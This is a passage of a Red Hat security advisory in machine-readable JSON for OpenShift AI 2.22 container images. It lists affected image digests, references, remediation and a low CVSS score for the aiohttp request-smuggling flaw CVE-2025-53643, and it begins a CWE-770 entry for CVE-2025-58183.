"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-53643"
},
{
"category": "external",
"summary": "RHBZ#2380000",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380000"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-53643",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53643"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a",
"url": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj"
}
],
"release_date": "2025-07-14T20:17:18.247000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "aiohttp: AIOHTTP HTTP Request/Response Smuggling"
},
{
"cve": "CVE-2025-58183",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-10-29T23:01:50.573951+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
